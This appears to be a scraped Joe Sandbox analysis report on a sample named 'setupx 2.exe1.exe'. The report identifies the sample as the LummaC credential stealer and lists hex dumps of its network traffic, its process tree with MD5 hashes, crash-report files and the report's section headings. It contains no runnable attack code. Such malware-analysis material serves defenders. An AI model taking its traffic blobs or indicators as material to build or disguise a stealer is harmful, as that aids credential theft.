2025-03-13 12:33:49 UTC	1369	IN	Data Raw: 6c f3 ea cd 45 6f eb 2b 69 77 ad 31 9c d1 01 43 04 fa 00 0b 47 ea 4d 45 ab e1 58 7f ed 97 16 60 bb 16 5b 1f fb 83 c4 80 e5 f2 71 0b cd c4 8d 84 89 63 dc 68 04 a9 62 7a b4 08 bf dc fb e0 b7 7f 25 35 c8 1f 43 6c 59 88 76 2f 49 0b ea eb f9 8b e1 19 01 8a 87 e3 0b a0 bb 29 ab bf e2 e0 0d 91 53 ac aa 61 7e a6 53 76 8a a2 ab 77 bf f0 4d 67 24 b6 39 9d 78 a7 d1 da ac bd f9 da a4 ed f7 70 3a 63 1d 19 dc 4f 32 14 79 69 2c c0 c0 df 55 60 3a 88 ff e1 7d 88 45 f7 6f 7b d4 7d f8 cd 27 5b 0b 79 a5 53 4a 1e dc f8 ff a0 02 e1 07 e1 7b 03 47 e8 05 ce 06 a5 89 95 5a cd 43 73 75 e1 3c c0 86 87 eb c8 a7 16 91 90 fd 05 ea 59 07 5d 58 e5 b5 4e a4 6a 44 00 42 fd 98 94 12 94 97 72 db 11 91 14 99 9f 87 51 70 29 6d 64 69 66 ca a6 fa 02 87 d3 c3 74 b5 63 62 4a 40 12 c7 d6 65 16 5b Data Ascii: lEo+iw1CGMEX`[qchbz%5ClYv/I)Sa~SvwMg$9xp:cO2yi,U`:}Eo{}'[ySJ{GZCsu<Y]XNjDBrQp)mdiftcbJ@e[
2025-03-13 12:33:49 UTC	365	IN	Data Raw: dc 23 f9 ef 1d b5 46 ed 48 38 70 ad fb 50 e2 5e d7 70 59 36 42 e3 10 f1 bb b1 54 23 98 9f dd a4 5a e6 da 7d 55 51 bc 16 8b 3e 40 8e 8c d0 6e 43 f2 19 c3 05 89 f8 bf 5d ad 61 0c 12 0f 43 f8 c7 20 e0 83 2f fe 05 9f eb 3c 76 64 d2 57 fb bd fc 67 ff 1f de 73 ff 20 df ef b8 e9 43 09 36 76 5a f8 76 16 1c fa 93 ed 59 63 f2 d1 80 b2 01 3b cc d2 b7 a3 45 9e f5 b8 3e 03 78 5a 15 45 f9 72 b6 af 98 6e 7e 55 45 aa 4b 98 e8 4e e3 64 b2 97 79 38 9f 56 cf 43 7c d8 8b f8 e3 41 ee a7 59 c4 84 eb 00 90 93 3a 74 18 8d 3b 78 bb 3b 9f 9d f9 fc ca 24 89 4e e6 21 3d 05 d8 a2 87 19 6e 10 ba ec 30 3b ff 92 e2 95 e2 a0 fa 19 b0 09 2c 79 f4 88 0f 3f 44 e4 6d 8d e1 25 e2 58 ef a1 77 8c f4 0d 78 5c b4 9c 28 e8 67 df 23 ae 79 29 c0 3b cf 9a 5f 01 24 3a 6f 22 d1 14 2a 3e ac 32 b3 26 9e Data Ascii: #FH8pP^pY6BT#Z}UQ>@nC]aC /<vdWgs C6vZvYc;E>xZErn~UEKNdy8VC\|AY:t;x;$N!=n0;,y?Dm%Xwx\(g#y);_$:o"*>2&

Target ID:	0
Start time:	08:33:29
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\setupx 2.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setupx 2.exe1.exe"
Imagebase:	0x120000
File size:	1'385'984 bytes
MD5 hash:	FCEBF765658EF7ADABF6A5B1CC1384F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:33:29
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:33:30
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\setupx 2.exe1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\setupx 2.exe1.exe"
Imagebase:	0x120000
File size:	1'385'984 bytes
MD5 hash:	FCEBF765658EF7ADABF6A5B1CC1384F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:33:30
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\setupx 2.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setupx 2.exe1.exe"
Imagebase:	0x120000
File size:	1'385'984 bytes
MD5 hash:	FCEBF765658EF7ADABF6A5B1CC1384F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2242806640.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:33:30
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 692
Imagebase:	0x40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setupx 2.exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_setupx 2.exe1.ex_b960bcf5c1ad9c718bf922e3d60b4e76a167a2d_a301da1a_86186d1a-3de1-4e84-b5f3-cb69f66ea0fb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1315.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1410.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER147F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
setupx 2.exe1.exe